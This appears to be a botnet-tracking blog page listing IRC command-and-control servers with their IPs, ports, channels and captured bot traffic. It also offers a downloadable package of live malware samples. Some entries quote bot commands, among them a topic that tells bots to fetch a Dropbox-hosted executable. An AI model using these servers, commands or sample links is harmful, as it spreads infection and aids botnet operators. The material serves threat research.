Finally first belgian hecker from Iran Remote Host Port Number 212.123.29.57 8080 NICK IC79467772 USER root 8 * : some name PONG :E1B2C2E5 JOIN #iseee PRIVMSG #iseee :&userid=COMPUTERNAME PONG :ircb.iranserv.com Telenet claim to be one of the best ISP in Belgium and this botnet is hosted in Telenet Network This is more funny: remarks: trouble:Read more...
213.58.198.106(irc botnet hosted in Portugal Lisbon Onitelecom – Infocomunicacoes S.a)
Remote Host Port Number 213.58.198.106 7107 NICK new[iRooT-XP-USA]694514 USER 4318 “” “TsGh” :4318 JOIN #!MSN! Coded PONG :irc.foonet.com NICK new[iRooT-XP-USA]389985 MODE #!Reklam! PRIVMSG #!Reklam! : OnLine… NICK DeliCocuk USER bruce “mIRC” “kayits.byinter.net” :KendiniBilmeZ JOIN #!Reklam! sikimiye MODE DeliCocuk +i USER 4207 “” “TsGh” :4207 JOIN #!MSN! Coded PRIVMSG #!MSN! :[Download]: Executed Successfully NICK anil USERRead more...
irc.unix-ccpower.com(linux bots hosted in United Kingdom Synergyworks Internet)
$servidor=’irc.unix-ccpower.com’ unless $servidor; my $porta=’7150′; my @adms=(“byz9991”); my @canais=(“#bot”); Resolved : [irc.unix-ccpower.com] To [64.186.152.41] Resolved : [irc.unix-ccpower.com] To [195.74.52.39] Resolved : [irc.unix-ccpower.com] To [200.75.12.211] hosting infos: http://whois.domaintools.com/195.74.52.39
70.107.249.167(irc botnet hosted in United States New York Verizon Online Llc)
Remote Host Port Number 70.107.249.167 3921 NICK GX454033315964 USER vrjvsahhszuw 0 0 :GX454033315964 USERHOST GX454033315964 MODE GX454033315964 +i JOIN #GLX . hosting infos: http://whois.domaintools.com/70.107.249.167
irc.ircatt.info(Gbot variant hosted in Germany Intergenia Ag)
Remote Host Port Number 188.138.89.21 2444 gBot gBot NICK n{USA|XP}lnatesd USER n{USA|XP}lnatesd 0 0 :n{USA|XP}lnatesd JOIN #Peach mychankey PRIVMSG #Peach :[FileProt]: File protection has been enabled for C:WINDOWSsystem32Windefend.exe Now talking in #Peach Topic On: [ #Peach ] [ .prot http://dl.dropbox.com/u/24455252/bins/java.exe] Topic By: [ Atthackers ] {ARE|W7}ywdxoqh) [FileProt]: File protection already enabled for C:WindowsSystem32Windefend.exe with http://dl.dropbox.com/u/24455252/bins/java.exeRead more...
dreamxwork.no-ip.org(irc botnet hosted in Netherlands Amsterdam Ecatel Ltd)
Remote Host Port Number 50.16.237.200 80 78.47.77.34 80 89.248.164.182 3211 PONG :IRC.Secret.GoV JOIN #Lucid NICK New{USA|XP-SP2|A}6421177 USER 6421177 “” “6421177” :6421177 MODE New{USA|XP-SP2|A}6421177 +iMm PRIVMSG #Msn : 9>>-
92.243.19.35(irc botnet hosted in France Gandi)
Remote Host Port Number 92.243.19.35 1337 NICK [nLh-VNC]eftvsr USER hdadboweq “fo8.net” “rage” :hdadboweq JOIN #VnC# PRIVMSG #VnC# : [RAGE SCAN:] range: 97.x.x.x/94 threads. PONG irc.priv8net.com hosting infos: http://whois.domaintools.com/92.243.19.35
37mb malware samples
Worms,bankers,irc bots inside this package have fun reversing them Download: http://adf.ly/1sSG7
88.86.113.239(irc botnet hosted in Czech Republic Liberec Supernetwork S.r.o)
Remote Host Port Number 88.86.113.239 31092 NICK US|computername USER siruyuse UNIX UNIX :username JOIN #global# JOIN #US Now talking in #global# Topic On: [ #global# ] [ omtECZWQgee3/7w9aGStOwmHmYQVTJXFx68dXRhkVWUhNomgeVieycdUnnRaoait ] Modes On: [ #global# ] [ +smntMu ] hosting infos: http://whois.domaintools.com/88.86.113.239
74.117.174.70(irc botnet hosted in United States Seattle Kwshells Internet Services)
Remote Host Port Number 74.117.174.70 1728 PONG :puc.ssb14e.jp JOIN ##lamer## hosting infos: http://whois.domaintools.com/74.117.174.70